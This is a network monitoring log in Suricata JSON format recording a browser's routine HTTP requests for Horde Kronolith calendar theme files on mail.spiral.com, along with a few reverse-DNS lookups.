{"timestamp":"2020-02-29T00:26:20.039474+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:26:20.040435+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":5}} {"timestamp":"2020-02-29T00:26:20.040949+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:26:20.042181+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} {"timestamp":"2020-02-29T00:26:20.043293+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":6}} {"timestamp":"2020-02-29T00:26:20.043781+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.044683+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:26:20.046209+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:26:20.044629+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":10}} {"timestamp":"2020-02-29T00:26:20.076688+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:26:20.077992+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":11}} {"timestamp":"2020-02-29T00:26:20.078718+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:26:20.077807+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.078388+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:26:20.079100+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.079595+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:26:20.079716+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:26:20.080724+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":2}} {"timestamp":"2020-02-29T00:26:20.082215+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.082235+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:26:20.082670+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":3}} 
{"timestamp":"2020-02-29T00:26:20.082847+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:26:20.083414+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:26:20.083613+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":8}} 
{"timestamp":"2020-02-29T00:26:20.083771+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.084509+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":4}} {"timestamp":"2020-02-29T00:26:20.085673+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} {"timestamp":"2020-02-29T00:26:20.087589+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":12}} {"timestamp":"2020-02-29T00:26:20.086399+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:26:20.086773+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:26:20.087255+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":9}} {"timestamp":"2020-02-29T00:26:20.088703+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":5}} 
{"timestamp":"2020-02-29T00:26:20.125287+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:26:20.129244+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:26:20.129190+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} 
{"timestamp":"2020-02-29T00:26:20.129324+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:26:20.153731+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":13}} {"timestamp":"2020-02-29T00:26:20.154066+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} 
{"timestamp":"2020-02-29T00:26:20.201408+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40121,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24589,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:20.234800+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":14}} {"timestamp":"2020-02-29T00:26:20.309691+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40121,"proto":"UDP","dns":{"type":"answer","id":24589,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:20.309691+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40121,"proto":"UDP","dns":{"type":"answer","id":24589,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.364046+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638}} {"timestamp":"2020-02-29T00:26:20.364046+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":15}} {"timestamp":"2020-02-29T00:26:20.398232+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":15}} {"timestamp":"2020-02-29T00:26:20.409015+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36501,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64994,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
